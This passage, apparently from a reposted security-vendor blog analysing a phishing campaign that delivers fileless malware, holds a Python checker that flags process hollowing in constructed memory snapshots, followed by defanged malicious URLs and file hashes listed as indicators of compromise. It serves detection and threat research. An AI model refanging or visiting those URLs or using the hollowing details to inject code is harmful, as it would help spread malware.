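<p>As an added example (not code from the original post or from the malware), here is the memory-side counterpart of the hollowing steps described in the previous section: read ImageBaseAddress at PEB+0x08 (the 0x7EFDE008 write, with the PEB at 0x7EFDE000) and Eip from a 32-bit CONTEXT, then cross-check both against the process\u2019s memory map, the kind of check memory-forensics plugins use to find hollowed processes. It also decodes the creation-flags value and the binary string passed in the ResumeThread call. The PEB, CONTEXT and memory-map snapshots are constructed, the addresses other than the PEB are illustrative, and the finding names are my own.<\/p>

```python
import struct
from typing import Dict, List, Optional

# Win32 process creation flags relevant here (values from WinBase.h).
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT",
    0x08000000: "CREATE_NO_WINDOW",
}

# Layout facts for a 32-bit (WOW64) target: PEB.ImageBaseAddress lives at PEB+0x08, so the
# 0x7EFDE008 write described in the post is ImageBaseAddress of a PEB at 0x7EFDE000.
# In the x86 CONTEXT structure Eax is at 0xB0 and Eip at 0xB8; sizeof(CONTEXT) is 0x2CC.
PEB_ADDR = 0x7EFDE000
PEB_IMAGE_BASE_OFF = 0x08
CTX_EAX_OFF, CTX_EIP_OFF, CTX_SIZE = 0xB0, 0xB8, 0x2CC


def decode_creation_flags(flags: int) -> List[str]:
    """Split a dwCreationFlags value into its named bits, lowest bit first."""
    return [name for bit, name in sorted(CREATION_FLAGS.items()) if flags & bit]


def decode_bit_string(s: str) -> str:
    """Undo the module's string obfuscation: 8 binary digits per ASCII character."""
    return "".join(chr(int(s[i:i + 8], 2)) for i in range(0, len(s), 8))


def make_peb(image_base: int) -> bytes:
    """Constructed PEB page with only ImageBaseAddress populated."""
    peb = bytearray(0x1000)
    struct.pack_into("<I", peb, PEB_IMAGE_BASE_OFF, image_base)
    return bytes(peb)


def make_context(eip: int, eax: int) -> bytes:
    """Constructed x86 CONTEXT: Eip is what the post says is redirected; Eax holds the
    entry point at thread start and is the register other hollowers patch instead."""
    ctx = bytearray(CTX_SIZE)
    struct.pack_into("<I", ctx, CTX_EIP_OFF, eip)
    struct.pack_into("<I", ctx, CTX_EAX_OFF, eax)
    return bytes(ctx)


def region_of(regions: List[Dict], addr: int) -> Optional[Dict]:
    return next((r for r in regions if r["base"] <= addr < r["base"] + r["size"]), None)


def check_hollowing(peb: bytes, ctx: bytes, regions: List[Dict]) -> List[str]:
    """Cross-check PEB.ImageBaseAddress and CONTEXT.Eip against the memory map. In a clean
    process both point into file-backed image mappings; after hollowing the PEB points at a
    private allocation, disagrees with the mapped .exe (if it is still mapped), and Eip lands
    in the private region too."""
    findings = []
    image_base = struct.unpack_from("<I", peb, PEB_IMAGE_BASE_OFF)[0]
    eip = struct.unpack_from("<I", ctx, CTX_EIP_OFF)[0]
    base_region = region_of(regions, image_base)
    if base_region is None or base_region["type"] != "image":
        findings.append("peb_imagebase_not_file_backed")
    exe = [r for r in regions if r["type"] == "image" and r["path"].lower().endswith(".exe")]
    if exe and exe[0]["base"] != image_base:
        findings.append("peb_imagebase_differs_from_mapped_exe")
    eip_region = region_of(regions, eip)
    if eip_region is None or eip_region["type"] != "image":
        findings.append("eip_outside_image_mappings")
    return findings


# Constructed memory maps for a 32-bit aspnet_compiler.exe (addresses are illustrative).
ASPNET = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
NTDLL = r"C:\Windows\SysWOW64\ntdll.dll"
CLEAN_REGIONS = [
    {"base": 0x00400000, "size": 0x00006000, "type": "image", "path": ASPNET},
    {"base": 0x77000000, "size": 0x00140000, "type": "image", "path": NTDLL},
    {"base": PEB_ADDR, "size": 0x1000, "type": "private", "path": None},
]
# After hollowing: payload written to a fresh private region, PEB and Eip repointed at it.
PAYLOAD_BASE = 0x00A00000
HOLLOWED_REGIONS = CLEAN_REGIONS + [
    {"base": PAYLOAD_BASE, "size": 0x00040000, "type": "private", "path": None},
]


def clean_snapshot():
    # Suspended thread of a fresh process: Eip in ntdll's thread-start stub, Eax = exe entry point.
    return make_peb(0x00400000), make_context(eip=0x77012340, eax=0x00401000), CLEAN_REGIONS


def hollowed_snapshot():
    entry = PAYLOAD_BASE + 0x2000
    return make_peb(PAYLOAD_BASE), make_context(eip=entry, eax=entry), HOLLOWED_REGIONS


if __name__ == "__main__":
    print(decode_creation_flags(0x08000004))
    print(decode_bit_string("010010010110111001110110011011110110101101100101"))
    for label, snap in (("clean", clean_snapshot()), ("hollowed", hollowed_snapshot())):
        print(label, check_hollowing(*snap))
```

<p>A clean process reports nothing; after hollowing the PEB image base lands in a private allocation, no longer matches the mapped executable, and Eip points into the same private region. Variants that unmap the original image and write the payload at its old base still trip the first check, because that region is no longer file-backed.<\/p>
<p>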
These three fileless malware are AveMariaRAT \/ BitRAT \/ PandoraHVNC.<\/p>\n<p>In Part 2 of this analysis, I will focus on these three fileless malware to see what they do on the victim\u2019s device, as well as what kind of data they are able to steal.<\/p>\n<h2>Fortinet Protections<\/h2>\n<p>Fortinet customers are already protected from this malware by\u00a0FortiGuard\u2019s\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/web-filtering.html?utm_source=blog&amp;utm_campaign=web-filtering\">Web Filtering<\/a>, AntiVirus,\u00a0<a href=\"https:\/\/www.fortinet.com\/products\/email-security\/fortimail.html?utm_source=blog&amp;utm_campaign=fortimail-main-page\">FortiMail<\/a>,\u00a0<a href=\"https:\/\/www.fortinet.com\/products\/endpoint-security\/forticlient.html?utm_source=blog&amp;utm_campaign=endpoint-web-page\">FortiClient<\/a>,\u00a0<a href=\"https:\/\/www.fortinet.com\/products\/endpoint-security\/fortiedr.html?utm_source=blog&amp;utm_campaign=fortiedr\">FortiEDR<\/a> services, and CDR (content disarm and reconstruction) services, as follows:<\/p>\n<p>All relevant URLs have been rated as &quot;<b>Malicious Websites<\/b>&quot; by the FortiGuard Web Filtering service.<\/p>\n<p>The phishing email with its attached malicious Excel document can be disarmed by the FortiGuard CDR (content disarm and reconstruction) service.<\/p>\n<p>The captured\u00a0Excel sample, the downloaded html file, and the PowerShell file with three fileless malware payload files are detected as &quot;<b>VBA\/Agent.DDON!tr<\/b>&quot;, &quot;<b>JS\/Agent.DDON!tr.dldr<\/b>&quot;, and &quot;<b>PowerShell\/Agent.e535!tr<\/b>&quot; and are blocked by the FortiGuard Antivirus service.<\/p>\n<p><a href=\"https:\/\/www.fortinet.com\/products\/endpoint-security\/fortiedr.html?utm_source=blog&amp;utm_campaign=fortiedr\">FortiEDR<\/a>\u00a0detects both the Excel file and the huge PowerShell file as malicious based on their 
behavior.<\/p>\n<p>In addition to these protections, we suggest that organizations have their end users also go through the\u00a0FREE\u00a0<a href=\"https:\/\/training.fortinet.com\/?utm_source=blog&amp;utm_campaign=nse-institute\">NSE training<\/a>:\u00a0<a href=\"https:\/\/training.fortinet.com\/local\/staticpage\/view.php?page=nse_1&amp;utm_source=blog&amp;utm_campaign=nse-1\">NSE 1 \u2013 Information Security Awareness<\/a>. It includes a module on Internet threats that is designed to help end users learn how to identify and protect themselves from phishing attacks.<\/p>\n<h2>IOCs<\/h2>\n<h4>URLs:<\/h4>\n<p>hxxps:\/\/taxfile[.]mediafire[.]com\/file\/6hxdxdkgeyq0z1o\/APRL27[.]htm\/file<\/p>\n<p>hxxps:\/\/www[.]mediafire[.]com\/file\/c3zcoq7ay6nql9i\/back[.]htm\/file<\/p>\n<p>hxxps:\/\/www[.]mediafire[.]com\/file\/jjyy2npmnhx6o49\/Start[.]htm\/file<\/p>\n<p>hxxps:\/\/taxmogalupupitpamobitola[.]blogspot[.]com\/atom[.]xml<\/p>\n<h4>Sample SHA-256 Involved in the Campaign:<\/h4>\n<p>[Remittance-Details-951244-1.xlam]<\/p>\n<p>8007BB9CAA6A1456FFC829270BE2E62D1905D5B71E9DC9F9673DEC9AFBF13BFC<\/p>\n<p>[APRL27.htm]<\/p>\n<p>D71ADD25520799720ADD43A5F4925B796BEA11BF55644990B4B9A70B7EAEACBA<\/p>\n<p>[mainpw.dll]<\/p>\n<p>3D71A243E5D9BA44E3D71D4DA15D928658F92B2F0A220B7DEFE0136108871449<\/p>\n<p><i>Learn more about Fortinet\u2019s\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=fortiguard-labs\">FortiGuard Labs<\/a>\u00a0threat research and intelligence organization and the FortiGuard Security Subscriptions and Services\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?tab=security-bundles&amp;utm_source=blog&amp;utm_campaign=security-bundles\">portfolio<\/a>.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a 
href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image.img.png\/1652300705505\/fig1.1..png\"\/><br \/>FortiGuard Labs discovered a phishing campaign delivering fileless malware to steal sensitive information from a victim\u2019s device. Read our analysis to find out more about how the campaign executes and maintains persistence on the victim\u2019s device.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-19025","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19025","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=19025"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19025\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=19025"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=190
25"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=19025"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}